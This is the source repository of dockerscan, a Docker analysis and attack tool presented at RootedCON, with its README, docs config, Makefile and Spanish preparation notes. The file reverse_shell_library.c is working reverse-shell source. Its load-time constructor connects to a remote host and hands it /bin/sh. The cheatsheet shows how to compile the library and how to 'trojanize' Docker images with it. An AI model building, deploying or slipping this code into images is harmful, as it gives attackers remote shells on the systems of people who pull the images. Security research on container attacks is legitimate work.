├── .github
└── FUNDING.yml
├── .gitignore
├── .idea
├── .name
├── DockerScan.iml
├── encodings.xml
├── inspectionProfiles
│ └── profiles_settings.xml
├── misc.xml
├── modules.xml
└── vcs.xml
├── CHANGELOG
├── LICENSE
├── MANIFEST.in
├── README.rst
├── codecov.yml
├── doc
├── Makefile
├── preparation
│ ├── IDEAS.rst
│ ├── cheatsheet.txt
│ ├── links.rst
│ ├── reverse_shell.so
│ └── reverse_shell_library.c
└── source
│ ├── _static
│ ├── dockerscan-logo.png
│ └── favicon.ico
│ ├── conf.py
│ ├── favicon.ico
│ ├── index.rst
│ └── quickstart.rst
├── dockerscan
├── __init__.py
├── __main__.py
├── actions
│ ├── __init__.py
│ ├── cli.py
│ ├── helpers.py
│ ├── image
│ │ ├── __init__.py
│ │ ├── api.py
│ │ ├── cli.py
│ │ ├── console.py
│ │ ├── docker_api.py
│ │ ├── image_analyzer.py
│ │ ├── model.py
│ │ └── modifiers
│ │ │ ├── __init__.py
│ │ │ ├── api.py
│ │ │ ├── cli.py
│ │ │ ├── console.py
│ │ │ ├── model.py
│ │ │ └── shells
│ │ │ └── reverse_shell.so
│ ├── registry
│ │ ├── __init__.py
│ │ ├── api.py
│ │ ├── cli.py
│ │ ├── console.py
│ │ ├── libs
│ │ │ ├── __init__.py
│ │ │ ├── helpers.py
│ │ │ └── registry_v2.py
│ │ └── model.py
│ └── scan
│ │ ├── __init__.py
│ │ ├── api.py
│ │ ├── cli.py
│ │ ├── console.py
│ │ └── model.py
└── core
│ ├── __init__.py
│ ├── exceptions.py
│ ├── helpers.py
│ ├── logger.py
│ ├── model.py
│ └── shared_cmd_options.py
├── pytest.ini
├── requirements-dev.txt
├── requirements-performance.txt
├── requirements-runtest.txt
├── requirements.txt
├── setup.py
├── test
├── __init__.py
└── unittesting
│ ├── __init__.py
│ ├── actions
│ ├── __init__.py
│ └── default
│ │ ├── __init__.py
│ │ ├── api
│ │ ├── __init__.py
│ │ └── test_run_dockerscan.py
│ │ └── cli
│ │ ├── __init__.py
│ │ ├── test_cli.py
│ │ └── test_cli_info.py
│ ├── core
│ ├── __init__.py
│ ├── helpers
│ │ ├── __init__.py
│ │ └── test_dict_to_obj.py
│ ├── logger
│ │ ├── __init__.py
│ │ └── test_setup_logging.py
│ └── shared_cmd_options
│ │ ├── __init__.py
│ │ └── test_global_options.py
│ └── mains
│ ├── __init__.py
│ └── test_apitest_comparer_main.py
└── tox.ini
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: [cr0hn]
4 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | #*.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | .eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 |
27 | # PyInstaller
28 | # Usually these files are written by a python script from a template
29 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .coverage.*
42 | .cache
43 | nosetests.xml
44 | coverage.xml
45 | *,cover
46 | .hypothesis/
47 |
48 | # Translations
49 | *.mo
50 | *.pot
51 |
52 | # Django stuff:
53 | *.log
54 | local_settings.py
55 |
56 | # Flask stuff:
57 | instance/
58 | .webassets-cache
59 |
60 | # Scrapy stuff:
61 | .scrapy
62 |
63 | # Sphinx documentation
64 | docs/_build/
65 |
66 | # PyBuilder
67 | target/
68 |
69 | # IPython Notebook
70 | .ipynb_checkpoints
71 |
72 | # pyenv
73 | .python-version
74 |
75 | # celery beat schedule file
76 | celerybeat-schedule
77 |
78 | # dotenv
79 | .env
80 |
81 | # virtualenv
82 | venv/
83 | ENV/
84 |
85 | # Spyder project settings
86 | .spyderproject
87 |
88 | # Rope project settings
89 | .ropeproject
90 | docker_images/
91 | /dockerscan/nginx-trojanized/
92 | /dockerscan/debian-base/
93 |
--------------------------------------------------------------------------------
/.idea/.name:
--------------------------------------------------------------------------------
1 | DockerScan
--------------------------------------------------------------------------------
/.idea/DockerScan.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CHANGELOG:
--------------------------------------------------------------------------------
1 | Version 1.0.0-alpha1
2 | ====================
3 |
4 | First release
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Copyright (c) Daniel Garcia (cr0hn) / Roberto Munoz
2 |
3 | Project home: https://github.com/cr0hn/dockerscan
4 | Project contact: author[at]mail.com
5 |
6 | Redistribution and use in source and binary forms, with or without modification,
7 | are permitted provided that the following conditions are met:
8 |
9 | 1. Redistributions of source code must retain the above copyright notice,
10 | this list of conditions and the following disclaimer.
11 |
12 | 2. Redistributions in binary form must reproduce the above copyright
13 | notice, this list of conditions and the following disclaimer in the
14 | documentation and/or other materials provided with the distribution.
15 |
16 | 3. Neither the name of Daniel Garcia (cr0hn) / Roberto Munoz nor the names of its contributors may be used
17 | to endorse or promote products derived from this software without
18 | specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
21 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
22 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
24 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
25 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
26 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
27 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
28 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
29 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------
/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include LICENSE CHANGELOG README.rst requirements.txt requirements-performance.txt dockerscan/actions/image/modifiers/shells/reverse_shell.so
2 |
3 | recursive-exclude * __pycache__
4 | recursive-exclude * *.pyc
5 | recursive-exclude * *.pyo
6 | recursive-exclude * *.orig
7 | recursive-exclude * .DS_Store
8 | global-exclude __pycache__/*
9 | global-exclude .deps/*
10 | global-exclude *.pyd
11 | global-exclude *.pyc
12 | global-exclude .git*
13 | global-exclude .DS_Store
14 | global-exclude .mailmap
15 |
16 | prune dockerscan/doc*
17 | graft dockerscan/resources/*
18 |
19 |
--------------------------------------------------------------------------------
/README.rst:
--------------------------------------------------------------------------------
1 | dockerscan
2 | ==========
3 |
4 | *dockerscan: A Docker analysis & hacking tools*
5 |
6 | .. image:: https://github.com/cr0hn/dockerscan/raw/master/doc/source/_static/dockerscan-logo.png
7 | :height: 64px
8 | :width: 64px
9 | :alt: DockerScan logo
10 |
11 | +----------------+--------------------------------------------------+
12 | |Project site | http://github.com/cr0hn/dockerscan |
13 | +----------------+--------------------------------------------------+
14 | |Issues | https://github.com/cr0hn/dockerscan/issues/ |
15 | +----------------+--------------------------------------------------+
16 | |Author | Daniel Garcia (cr0hn) / Roberto Munoz (robskye) |
17 | +----------------+--------------------------------------------------+
18 | |Documentation | http://dockerscan.readthedocs.org |
19 | +----------------+--------------------------------------------------+
20 | |Last Version | 1.0.0-Alpha-02 |
21 | +----------------+--------------------------------------------------+
22 | |Python versions | 3.5 or above |
23 | +----------------+--------------------------------------------------+
24 |
25 | Support this project
26 | ====================
27 |
28 | Support this project (to solve issues, new features...) by applying the Github "Sponsor" button.
29 |
30 | What's dockerscan
31 | =================
32 |
33 | A Docker analysis tools
34 |
35 | Very quick install
36 | ==================
37 |
38 | .. code-block:: bash
39 |
40 | > python3.5 -m pip install -U pip
41 | > python3.5 -m pip install dockerscan
42 |
43 | Show options:
44 |
45 | .. code-block:: bash
46 |
47 | > dockerscan -h
48 |
49 | Available actions
50 | =================
51 |
52 | Currently Docker Scan support these actions:
53 |
54 | - Scan: Scan a network trying to locate Docker Registries
55 |
56 | - Registry
57 |
58 | - Delete: Delete remote image / tag
59 | - Info: Show info from remote registry
60 | - Push: Push an image (like Docker client)
61 | - Upload: Upload a random file
62 |
63 | - Image
64 |
65 | - Analyze: Looking for sensitive information in a Docker image.
66 |
67 | - Looking for passwords in environment vars.
68 | - Try to find any URL / IP in the environment vars.
69 | - Try to deduce the user used internally to run the software. This is not trivial. If the entry point is a .sh file. Read the file and try to find call to sudo-like: “sudo”, “gosu”, “sh -u”… And report the user found.
70 |
71 | - Extract: extract a docker image
72 | - Info: Get a image meta information
73 | - Modify:
74 |
75 | - entrypoint: change the entrypoint in a docker
76 | - **trojanize**: inject a reverser shell into a docker image
77 | - user: change running user in a docker image
78 |
79 | What's the difference from Clair or Docker Cloud?
80 | =================================================
81 |
82 | The purpose of Dockerscan is different. It's foccussed in the attack phase.
83 |
84 | Although Dockescan has some functionalities to detect vulnerabilities in Docker images and Docker registries, the objective is the attack.
85 |
86 | Documentation
87 | =============
88 |
89 | Documentation is still in progress... sorry!
90 |
91 | For the moment we only have the slides presented at RootedCON Spain, the conference where Docker Scan was presented:
92 |
93 | https://www.slideshare.net/cr0hn/rootedcon-2017-docker-might-not-be-your-friend-trojanizing-docker-images/1
94 |
95 | Or you can watch it in video format (recommended):
96 |
97 | https://youtu.be/OwX1e4y4JMk
98 |
99 | Also, you can watch a dockerscan usage demo:
100 |
101 | https://youtu.be/UvtBGIb3E3o
102 |
103 | Contributing
104 | ============
105 |
106 | Any collaboration is welcome!
107 |
108 | There are many tasks to do. You can check the `Issues `_ and send us a Pull Request.
109 |
110 | License
111 | =======
112 |
113 | This project is distributed under `BSD license `_
114 |
115 |
--------------------------------------------------------------------------------
/codecov.yml:
--------------------------------------------------------------------------------
1 | codecov:
2 | branch: master
3 |
4 | coverage:
5 | range: "85...100"
--------------------------------------------------------------------------------
/doc/Makefile:
--------------------------------------------------------------------------------
1 | # Makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line.
5 | SPHINXOPTS =
6 | SPHINXBUILD = sphinx-build
7 | PAPER =
8 | BUILDDIR = build
9 |
10 | # User-friendly check for sphinx-build
11 | ifeq ($(shell which $(SPHINXBUILD) >/dev/null 2>&1; echo $$?), 1)
12 | $(error The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed, then set the SPHINXBUILD environment variable to point to the full path of the '$(SPHINXBUILD)' executable. Alternatively you can add the directory with the executable to your PATH. If you don't have Sphinx installed, grab it from http://sphinx-doc.org/)
13 | endif
14 |
15 | # Internal variables.
16 | PAPEROPT_a4 = -D latex_paper_size=a4
17 | PAPEROPT_letter = -D latex_paper_size=letter
18 | ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
19 | # the i18n builder cannot share the environment and doctrees with the others
20 | I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
21 |
22 | .PHONY: help
23 | help:
24 | @echo "Please use \`make ' where is one of"
25 | @echo " html to make standalone HTML files"
26 | @echo " dirhtml to make HTML files named index.html in directories"
27 | @echo " singlehtml to make a single large HTML file"
28 | @echo " pickle to make pickle files"
29 | @echo " json to make JSON files"
30 | @echo " htmlhelp to make HTML files and a HTML help project"
31 | @echo " qthelp to make HTML files and a qthelp project"
32 | @echo " applehelp to make an Apple Help Book"
33 | @echo " devhelp to make HTML files and a Devhelp project"
34 | @echo " epub to make an epub"
35 | @echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
36 | @echo " latexpdf to make LaTeX files and run them through pdflatex"
37 | @echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx"
38 | @echo " text to make text files"
39 | @echo " man to make manual pages"
40 | @echo " texinfo to make Texinfo files"
41 | @echo " info to make Texinfo files and run them through makeinfo"
42 | @echo " gettext to make PO message catalogs"
43 | @echo " changes to make an overview of all changed/added/deprecated items"
44 | @echo " xml to make Docutils-native XML files"
45 | @echo " pseudoxml to make pseudoxml-XML files for display purposes"
46 | @echo " linkcheck to check all external links for integrity"
47 | @echo " doctest to run all doctests embedded in the documentation (if enabled)"
48 | @echo " coverage to run coverage check of the documentation (if enabled)"
49 |
50 | .PHONY: clean
51 | clean:
52 | rm -rf $(BUILDDIR)/*
53 |
54 | .PHONY: html
55 | html:
56 | $(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
57 | @echo
58 | @echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
59 |
60 | .PHONY: dirhtml
61 | dirhtml:
62 | $(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
63 | @echo
64 | @echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
65 |
66 | .PHONY: singlehtml
67 | singlehtml:
68 | $(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
69 | @echo
70 | @echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
71 |
72 | .PHONY: pickle
73 | pickle:
74 | $(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
75 | @echo
76 | @echo "Build finished; now you can process the pickle files."
77 |
78 | .PHONY: json
79 | json:
80 | $(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
81 | @echo
82 | @echo "Build finished; now you can process the JSON files."
83 |
84 | .PHONY: htmlhelp
85 | htmlhelp:
86 | $(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
87 | @echo
88 | @echo "Build finished; now you can run HTML Help Workshop with the" \
89 | ".hhp project file in $(BUILDDIR)/htmlhelp."
90 |
91 | .PHONY: qthelp
92 | qthelp:
93 | $(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
94 | @echo
95 | @echo "Build finished; now you can run "qcollectiongenerator" with the" \
96 | ".qhcp project file in $(BUILDDIR)/qthelp, like this:"
97 | @echo "# qcollectiongenerator $(BUILDDIR)/qthelp/API-Test.qhcp"
98 | @echo "To view the help file:"
99 | @echo "# assistant -collectionFile $(BUILDDIR)/qthelp/API-Test.qhc"
100 |
101 | .PHONY: applehelp
102 | applehelp:
103 | $(SPHINXBUILD) -b applehelp $(ALLSPHINXOPTS) $(BUILDDIR)/applehelp
104 | @echo
105 | @echo "Build finished. The help book is in $(BUILDDIR)/applehelp."
106 | @echo "N.B. You won't be able to view it unless you put it in" \
107 | "~/Library/Documentation/Help or install it in your application" \
108 | "bundle."
109 |
110 | .PHONY: devhelp
111 | devhelp:
112 | $(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
113 | @echo
114 | @echo "Build finished."
115 | @echo "To view the help file:"
116 | @echo "# mkdir -p $$HOME/.local/share/devhelp/API-Test"
117 | @echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/API-Test"
118 | @echo "# devhelp"
119 |
120 | .PHONY: epub
121 | epub:
122 | $(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
123 | @echo
124 | @echo "Build finished. The epub file is in $(BUILDDIR)/epub."
125 |
126 | .PHONY: latex
127 | latex:
128 | $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
129 | @echo
130 | @echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
131 | @echo "Run \`make' in that directory to run these through (pdf)latex" \
132 | "(use \`make latexpdf' here to do that automatically)."
133 |
134 | .PHONY: latexpdf
135 | latexpdf:
136 | $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
137 | @echo "Running LaTeX files through pdflatex..."
138 | $(MAKE) -C $(BUILDDIR)/latex all-pdf
139 | @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
140 |
141 | .PHONY: latexpdfja
142 | latexpdfja:
143 | $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
144 | @echo "Running LaTeX files through platex and dvipdfmx..."
145 | $(MAKE) -C $(BUILDDIR)/latex all-pdf-ja
146 | @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
147 |
148 | .PHONY: text
149 | text:
150 | $(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
151 | @echo
152 | @echo "Build finished. The text files are in $(BUILDDIR)/text."
153 |
154 | .PHONY: man
155 | man:
156 | $(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
157 | @echo
158 | @echo "Build finished. The manual pages are in $(BUILDDIR)/man."
159 |
160 | .PHONY: texinfo
161 | texinfo:
162 | $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
163 | @echo
164 | @echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
165 | @echo "Run \`make' in that directory to run these through makeinfo" \
166 | "(use \`make info' here to do that automatically)."
167 |
168 | .PHONY: info
169 | info:
170 | $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
171 | @echo "Running Texinfo files through makeinfo..."
172 | make -C $(BUILDDIR)/texinfo info
173 | @echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
174 |
175 | .PHONY: gettext
176 | gettext:
177 | $(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
178 | @echo
179 | @echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
180 |
181 | .PHONY: changes
182 | changes:
183 | $(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
184 | @echo
185 | @echo "The overview file is in $(BUILDDIR)/changes."
186 |
187 | .PHONY: linkcheck
188 | linkcheck:
189 | $(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
190 | @echo
191 | @echo "Link check complete; look for any errors in the above output " \
192 | "or in $(BUILDDIR)/linkcheck/output.txt."
193 |
194 | .PHONY: doctest
195 | doctest:
196 | $(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
197 | @echo "Testing of doctests in the sources finished, look at the " \
198 | "results in $(BUILDDIR)/doctest/output.txt."
199 |
200 | .PHONY: coverage
201 | coverage:
202 | $(SPHINXBUILD) -b coverage $(ALLSPHINXOPTS) $(BUILDDIR)/coverage
203 | @echo "Testing of coverage in the sources finished, look at the " \
204 | "results in $(BUILDDIR)/coverage/python.txt."
205 |
206 | .PHONY: xml
207 | xml:
208 | $(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml
209 | @echo
210 | @echo "Build finished. The XML files are in $(BUILDDIR)/xml."
211 |
212 | .PHONY: pseudoxml
213 | pseudoxml:
214 | $(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
215 | @echo
216 | @echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."
217 |
--------------------------------------------------------------------------------
/doc/preparation/IDEAS.rst:
--------------------------------------------------------------------------------
1 | Ideas for the talk
2 | ==================
3 |
4 |
5 | Slides
6 | ------
7 |
8 | [ ] Define structure
9 | [ ] Define index
10 |
11 |
12 | Tool
13 | ----
14 |
15 | [ ] Define actions that the tool will does
16 |
--------------------------------------------------------------------------------
/doc/preparation/cheatsheet.txt:
--------------------------------------------------------------------------------
1 | Pushear un container:
2 |
3 | docker tag busybox 127.0.0.1:5000/cr0hn/busybox
4 | docker tag postgres:9.6.1-alpine 127.0.0.1:5000/cr0hn/postgres
5 |
6 | docker push 127.0.0.1:5000/cr0hn/busybox
7 | docker push 127.0.0.1:5000/cr0hn/postgres
8 |
9 |
10 | Cosas chulas:
11 |
12 | -= Borrado de imágenes =-
13 |
14 | No se pueden borrar imágenes ni manifest de los registries, a no ser que lo actives expresamente. Por defecto no se puede, ya que se configura el registry como: "pull-through cache":
15 |
16 | docker run -d -p 5000:5000 --restart=always --name registry \
17 | -v `pwd`/config.yml:/etc/docker/registry/config.yml \
18 | registry:2
19 |
20 | > config.yml:
21 |
22 | delete:
23 | enabled: false
24 |
25 | Es decir:
26 |
27 | Si te suben un malware estará ahí por los tiempos de los tiempos.
28 |
29 | referencias:
30 | - Fichero de configuracion: https://docs.docker.com/registry/configuration/
31 | - Pull through cache: https://docs.docker.com/registry/recipes/mirror/
32 |
33 | -= Subida de ficheros =-
34 |
35 | Si subes un fichero a un registry, se queda registrado, pero no se puede acceder a él salvo que tengas el digest. Y tampoco se puede borrar si está el Registry por defecto.
36 |
37 | -= Compilar la librerya dinámica =-
38 |
39 | gcc -c -fpic reverse_shell_library.c
40 | gcc -shared -o reverse_shell.so reverse_shell_library.o
41 |
42 |
43 | -= Cambiar entry-point ejemplo =-
44 |
45 | 1 - Mostrar la info de la imagen "rawmind/alpine-traefik:1.1.2-1"
46 |
47 | python __main__.py -vvvvvv image info docker_images/alpine-traefik\:1.1.2-1
48 |
49 | 2 - Cambiar el entry-point
50 |
51 | python __main__.py -vvvvvv image modify entrypoint docker_images/alpine-traefik:1.1.2-1 /bin/bash
52 |
53 | 3 - Mostrar la info del nuevo container:
54 |
55 | python __main__.py -vvvvvv image info alpine-traefik\:1.1.2-1.tar
56 |
57 | 4 - Cargar el container en docker:
58 |
59 | docker load -i alpine-traefik\:1.1.2-1.tar
60 |
61 | 5 - Ejecutar el container
62 |
63 | docker run --rm rawmind/alpine-traefik:1.1.2-1
64 |
65 | Y de modo interactivo (recordar que se ha cambiado el entry-point a bash. Lo que implica que se ejecutará y acabará bash):
66 |
67 | docker run --rm -it rawmind/alpine-traefik:1.1.2-1
68 |
69 |
70 | -= Creando la imágenes de docker =-
71 |
72 | Crear debian base:
73 |
74 | docker build -t localhost:5000/debian-base:latest .
75 | docker push localhost:5000/debian-base:latest
76 | docker save localhost:5000/debian-base:latest -o debian-base:latest
77 |
78 | Troyanizamos imagen:
79 |
80 | python __main__.py image modify trojanize debian-base/debian-base\:latest -l 192.168.43.196
81 |
82 | Cargamos imagen troyanizada:
83 |
84 | docker load -i debian-base\:latest
85 |
86 | Pusheamos la imagen:
87 |
88 | docker push localhost:5000/debian-base:latest
89 |
90 | Cargamos el nginx
91 |
92 | docker build -t nginx-trojanized .
93 |
--------------------------------------------------------------------------------
/doc/preparation/links.rst:
--------------------------------------------------------------------------------
1 | Useful links
2 | ============
3 |
4 | MindMap
5 | -------
6 |
7 | - https://drive.mindmup.com/map/0B1Z-wk-sBrI1Sk5LNHctcFBzemM
8 |
9 | Extract Docker images / info
10 | ----------------------------
11 |
12 | - https://github.com/larsks/undocker
13 | - https://github.com/davedoesdev/dtuf
14 | - https://github.com/davedoesdev/dxf
15 |
16 | Modify ELFs
17 | -----------
18 | - https://github.com/thorkill/eresi/wiki/TheELFsh
19 | - https://github.com/tiago4orion/libmalelf
20 |
--------------------------------------------------------------------------------
/doc/preparation/reverse_shell.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/preparation/reverse_shell.so
--------------------------------------------------------------------------------
/doc/preparation/reverse_shell_library.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | //#define raddr "127.0.0.1"
10 | //#define rport 2222
11 |
12 | static int con() __attribute__((constructor));
13 |
14 |
15 | int con()
16 | {
17 | int pid = fork();
18 | if(pid == 0)
19 | {
20 | const char *raddr = (const char *)getenv("REMOTE_ADDR");
21 | uint16_t rport = (uint16_t )atoi(getenv("REMOTE_PORT"));
22 | char buffy[] = "connecting people\n\r";
23 | struct sockaddr_in sa;
24 | int s;
25 | sa.sin_family = AF_INET;
26 | sa.sin_addr.s_addr = inet_addr(raddr);
27 | sa.sin_port = htons(rport);
28 |
29 | s = socket(AF_INET, SOCK_STREAM, 0);
30 | connect(s, (struct sockaddr *)&sa, sizeof(sa));
31 | write(s,buffy,sizeof(buffy));
32 | dup2(s, 0);
33 | dup2(s, 1);
34 | dup2(s, 2);
35 |
36 | execve("/bin/sh", 0, 0);
37 | return 0;
38 | }
39 | else
40 | {
41 | return 0;
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/doc/source/_static/dockerscan-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/source/_static/dockerscan-logo.png
--------------------------------------------------------------------------------
/doc/source/_static/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/source/_static/favicon.ico
--------------------------------------------------------------------------------
/doc/source/conf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | #
3 | # API-Test documentation build configuration file, created by
4 | # sphinx-quickstart on Mon Oct 10 23:43:03 2016.
5 | #
6 | # This file is execfile()d with the current directory set to its
7 | # containing dir.
8 | #
9 | # Note that not all possible configuration values are present in this
10 | # autogenerated file.
11 | #
12 | # All configuration values have a default; values that are commented out
13 | # serve to show the default.
14 |
15 | import os
16 | import sys
17 |
18 | # If extensions (or modules to document with autodoc) are in another directory,
19 | # add these directories to sys.path here. If the directory is relative to the
20 | # documentation root, use os.path.abspath to make it absolute, like shown here.
21 | sys.path.insert(0, os.path.abspath(os.path.join('..', "..")))
22 |
23 | # -- General configuration ------------------------------------------------
24 |
25 | # If your documentation needs a minimal Sphinx version, state it here.
26 | #needs_sphinx = '1.0'
27 |
28 | # Add any Sphinx extension module names here, as strings. They can be
29 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
30 | # ones.
31 |
32 | extensions = [
33 | 'alabaster',
34 | 'sphinxcontrib.asyncio',
35 | 'sphinx.ext.autodoc',
36 | 'sphinx.ext.viewcode',
37 | 'sphinx.ext.mathjax'
38 | ]
39 |
40 | # Add any paths that contain templates here, relative to this directory.
41 | templates_path = ['_templates']
42 |
43 | # The suffix(es) of source filenames.
44 | # You can specify multiple suffix as a list of string:
45 | # source_suffix = ['.rst', '.md']
46 | source_suffix = '.rst'
47 |
48 | # The encoding of source files.
49 | #source_encoding = 'utf-8-sig'
50 |
51 | # The master toctree document.
52 | master_doc = 'index'
53 |
54 | # General information about the project.
55 | project = u'dockerscan'
56 | copyright = u'2017, Daniel Garcia (cr0hn) / Roberto Munoz'
57 | author = u'Daniel Garcia (cr0hn) / Roberto Munoz'
58 |
59 | # The version info for the project you're documenting, acts as replacement for
60 | # |version| and |release|, also used in various other places throughout the
61 | # built documents.
62 | #
63 |
64 | # This code was taken from Flask conf: https://github.com/pallets/flask/blob/master/docs/conf.py
65 | # try:
66 | # release = pkg_resources.get_distribution('aspitest').version
67 | # except pkg_resources.DistributionNotFound:
68 | # print('APITest must be installed to build the documentation.')
69 | # print('Install from source using `pip install -e .` in a virtualenv.')
70 | # sys.exit(1)
71 | #
72 | # if 'dev' in release:
73 | # release = ''.join(release.partition('dev')[:2])
74 | #
75 | # version = '.'.join(release.split('.')[:2])
76 | version = "1.0.0"
77 | release = "1.0.0"
78 |
79 |
80 | # The language for content autogenerated by Sphinx. Refer to documentation
81 | # for a list of supported languages.
82 | #
83 | # This is also used if you do content translation via gettext catalogs.
84 | # Usually you set "language" from the command line for these cases.
85 | language = "en"
86 |
87 | # There are two options for replacing |today|: either, you set today to some
88 | # non-false value, then it is used:
89 | #today = ''
90 | # Else, today_fmt is used as the format for a strftime call.
91 | #today_fmt = '%B %d, %Y'
92 |
93 | # List of patterns, relative to source directory, that match files and
94 | # directories to ignore when looking for source files.
95 | exclude_patterns = []
96 |
97 | # The reST default role (used for this markup: `text`) to use for all
98 | # documents.
99 | #default_role = None
100 |
101 | # If true, '()' will be appended to :func: etc. cross-reference text.
102 | #add_function_parentheses = True
103 |
104 | # If true, the current module name will be prepended to all description
105 | # unit titles (such as .. function::).
106 | #add_module_names = True
107 |
108 | # If true, sectionauthor and moduleauthor directives will be shown in the
109 | # output. They are ignored by default.
110 | #show_authors = False
111 |
112 | # The name of the Pygments (syntax highlighting) style to use.
113 | pygments_style = 'sphinx'
114 | highlight_language = "python3"
115 |
